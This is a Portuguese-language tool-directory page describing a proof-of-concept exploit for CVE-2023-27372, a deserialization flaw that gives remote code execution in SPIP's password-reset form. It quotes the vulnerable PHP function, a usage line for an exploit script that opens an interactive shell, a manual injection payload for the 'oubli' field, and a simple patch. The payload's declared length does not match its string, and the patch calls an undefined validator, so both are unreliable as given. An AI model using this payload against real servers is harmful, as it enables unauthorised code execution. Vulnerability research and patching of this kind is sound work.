Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-27372-PoC — Isto é uma PoC para o CVE-2023-27372 que cria um shell totalmente interativo. | Kitploit
Ferramentas/GitHubGitHub/0spwn/cve-2023-27372-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHub0spwn/cve-2023-27372-poc

CVE-2023-27372-PoC

Isto é uma PoC para o CVE-2023-27372 que cria um shell totalmente interativo.

Ver Repositório
6há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Este PoC foi escrito rapidamente, não é nada de especial.

Isto explora a nova vulnerabilidade RCE SPIP CVE-2023-27372.

É uma falha de desserialização que explora o uso perigoso da tag #ENV durante o recurso de reset de senha (spip.php?page=spip_pass) dentro de "/ecrire/balise/formulaire_.php" Especificamente esta linha:

  1. Syntax: python3 exploit.py -u http(s)://url.com
root@kitploit:~
function protege_champ($texte){

	if (is_array($texte))

		$texte = array_map('protege_champ',$texte);

	else {

		// ne pas corrompre une valeur serialize

		if (preg_match(",^[abis]:\d+[:;],", $texte) AND unserialize($texte)!=false)

			return $texte;

		$texte = entites_html($texte);

		$texte = str_replace("'","'",$texte);

	}

	return $texte;

}

A função protege_champ sofre de várias falhas. A verificação de expressão regular (RE) usada para validar a entrada é falha e pode ser facilmente contornada. O código chama a função unserialize sem validação adequada, permitindo a execução de código arbitrário. A exploração manual pode ser feita de forma extremamente fácil. Por exemplo, se quiséssemos executar phpinfo(); podemos fazer:

root@kitploit:~
oubli=s:19:"<?phpinfo(); ?>";

Se o servidor retornar a saída esperada, está vulnerável. Como podemos corrigir? Na verdade, de forma bastante simples. Abaixo, escrevi um patch básico:

root@kitploit:~
function protege_champ($texte) {

  if (is_array($texte)) {

    $texte = array_map('protege_champ', $texte);

  } else {

    if (!isValidInput($texte)) {

      $texte = 'Malicious input detected';

    } else {

      $texte = entites_html($texte);

      $texte = str_replace("'", "&#39;", $texte);

    }

  }

  return $texte;

}

A função protege_champ corrigida inclui validação de entrada, sanitização e tratamento de entrada maliciosa.

Por favor, não use isto para fins maliciosos. Obrigado.

<a href=https://twitter.com/0SPwn>Twitter

Baixar ferramenta